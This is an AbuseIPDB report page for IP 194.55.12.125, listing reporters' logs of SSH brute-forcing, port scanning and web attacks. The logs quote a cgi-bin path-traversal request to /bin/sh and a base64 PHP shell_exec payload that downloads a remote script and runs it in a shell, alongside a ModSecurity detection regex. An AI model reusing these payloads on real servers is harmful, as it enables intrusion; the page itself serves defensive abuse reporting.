JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 194.55.12.125

194.55.12.125 was found in our database!

This IP was reported 188 times. Confidence of Abuse is 0%: ?

ISP	netcup GmbH
Usage Type	Data Center/Web Hosting/Transit
ASN	AS197540
Hostname(s)	ettker.de
Domain Name	netcup.de
Country	🇩🇪 Germany
City	Nuremberg, Bavaria

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 194.55.12.125

Whois 194.55.12.125

IP Abuse Reports for 194.55.12.125:

This IP address has been reported a total of 188 times from 142 distinct sources. 194.55.12.125 was first reported on May 12th 2025, and the most recent report was 1 year ago.

Old Reports: The most recent abuse report for this IP address is from 1 year ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇹🇷 rtbh.com.tr	2025-05-14 20:08:09 (1 year ago)	list.rtbh.com.tr report: tcp/0	Brute-Force
Anonymous	2025-05-14 10:58:58 (1 year ago)	[13/May/2025:00:11:49 -0400] - [13/May/2025:00:12:09 -0400] Php probe script	Hacking
🇧🇷 SOC-BR	2025-05-14 07:05:47 (1 year ago)	Attack detected by Fortinet - apache: Apache.HTTP.Server.cgi-bin.Path.Traversal - 2025-05-13 03:15:5 ... show more Attack detected by Fortinet - apache: Apache.HTTP.Server.cgi-bin.Path.Traversal - 2025-05-13 03:15:55 - Source Port 54490 show less	Port Scan Hacking
🇹🇷 rtbh.com.tr	2025-05-14 00:06:36 (1 year ago)	list.rtbh.com.tr report: tcp/0	Brute-Force
🇦🇹 urnilxfgbez	2025-05-13 22:45:00 (1 year ago)	Last 24 Hours suspicious: (DPT=445\|DPT=3389\|DPT=22\|DPT=3306\|DPT=8080\|DPT=23\|DPT=5900\|DPT=1433)	Port Scan
🇹🇷 rtbh.com.tr	2025-05-13 20:06:36 (1 year ago)	list.rtbh.com.tr report: tcp/0	Brute-Force
🇳🇱 JCB	2025-05-13 15:33:00 (1 year ago)	194.55.12.125 - - [13/May/2025:04:02:08 +0300] "POST /cgi-bin/../../../../../../../../../../bin/sh H ... show more 194.55.12.125 - - [13/May/2025:04:02:08 +0300] "POST /cgi-bin/../../../../../../../../../../bin/sh HTTP/1.1" 400 226 "-" "Custom-AsyncHttpClient" 194.55.12.125 - - [13/May/2025:04:02:10 +0300] "POST /cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 400 226 "-" "Custom-AsyncHttpClient" ... show less	Hacking Web App Attack
🇹🇷 rtbh.com.tr	2025-05-13 12:06:36 (1 year ago)	list.rtbh.com.tr report: tcp/22, tcp/23	Brute-Force
Anonymous	2025-05-13 09:57:38 (1 year ago)	2025-05-13T09:56:21.070889+00:00 polka sshd-session[296953]: Connection closed by invalid user home ... show more 2025-05-13T09:56:21.070889+00:00 polka sshd-session[296953]: Connection closed by invalid user home 194.55.12.125 port 39124 [preauth] 2025-05-13T09:56:55.725894+00:00 polka sshd-session[296960]: Invalid user cyrus from 194.55.12.125 port 50112 2025-05-13T09:56:56.346092+00:00 polka sshd-session[296960]: Connection closed by invalid user cyrus 194.55.12.125 port 50112 [preauth] 2025-05-13T09:57:37.838342+00:00 polka sshd-session[296962]: error: kex_exchange_identification: read: Connection reset by peer 2025-05-13T09:57:37.838382+00:00 polka sshd-session[296962]: Connection reset by 194.55.12.125 port 34952 ... show less	Brute-Force SSH
🇩🇪 on-com	2025-05-13 09:53:42 (1 year ago)	URL scan	Brute-Force Web App Attack
🇺🇸 MPL	2025-05-13 09:34:43 (1 year ago)	tcp/80 (2 or more attempts)	Port Scan
🇺🇸 webnestify	2025-05-13 09:32:42 (1 year ago)	2025-05-13T09:32:42.362260+00:00 wn-us sshd[991273]: Invalid user teste from 194.55.12.125 port 3333 ... show more 2025-05-13T09:32:42.362260+00:00 wn-us sshd[991273]: Invalid user teste from 194.55.12.125 port 33330 ... show less	Brute-Force SSH
🇫🇷 subnetprotocol	2025-05-13 09:22:21 (1 year ago)	13/May/2025:11:22:20.150442 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ... show more 13/May/2025:11:22:20.150442 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 194.55.12.125] ModSecurity: Warning. Pattern match "(?i)(?:;\|\\\\\\\\{\|\\\\\\\\\|\|\\\\\\\\\|\\\\\\\\\|\|&\|&&\|\\\\\\\\n\|\\\\\\\\r\|`)\\\\\\\\s[\\\\\\\\(,@\\\\\\\\'\\\\"\\\\\\\\s](?:[\\\\\\\\w'\\\\"\\\\\\\\./]+/\|[\\\\\\\\\\\\\\\\'\\\\"\\\\\\\\^]\\\\\\\\w[\\\\\\\\\\\\\\\\'\\\\"\\\\\\\\^]:.\\\\\\\\\\\\\\\\\|[\\\\\\\\^\\\\\\\\.\\\\\\\\w '\\\\"/\\\\\\\\\\\\\\\\]\\\\\\\\\\\\\\\\)?[\\\\"\\\\\\\\^](?:m[\\\\"\\\\\\\\^](?:y[\\\\"\\\\\\\\^]s[\\\\"\\\\\\\\^]q[\\\\"\\\\\\\\^]l(?:[\\\\"\\\\\\\\^](?:d[\\\\"\\\\\\\\^]u[\\\\"\\\\\\\\^]m[\\\\"\\\\\\\\^]p(?:[\\\\"\\\\\\\\^]s[\\\\"\\\\\\\\^ ..." at ARGS:<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzEwNy4xNTAuMC4xMDMvc2ggfHwgd2dldCBodHRwOi8vMTA3LjE1MC4wLjEwMy9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "256"] [i ... show less	Hacking Web App Attack
🇩🇪 MarkGGN	2025-05-13 09:15:56 (1 year ago)	This IP was detected by CrowdSec triggering crowdsecurity/http-cve-2021-41773	Hacking Web App Attack
🇨🇭 Ribeye375	2025-05-13 09:10:14 (1 year ago)	HIPS fake-user-agent - Block tcp/0:65535	Port Scan Bad Web Bot

Showing 1 to 15 of 188 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇫🇷 185.182.8.41

🇮🇩 41.216.178.119

🇺🇸 194.187.179.125

🇿🇦 169.239.183.156

🇳🇬 165.154.176.251

🇧🇷 138.117.46.143

🇳🇬 102.88.21.136

🇫🇷 91.231.89.47

🇺🇸 64.247.196.123

🇸🇦 51.39.229.221

🇬🇧 35.203.211.89

🇺🇸 13.218.118.164

🇨🇳 8.134.129.191

🇺🇸 4.227.177.11

🇨🇳 218.82.0.210

🇬🇧 193.163.125.122

🇺🇾 186.50.150.109

🇳🇱 172.94.9.120

🇭🇰 152.32.188.207

🇨🇳 106.75.25.139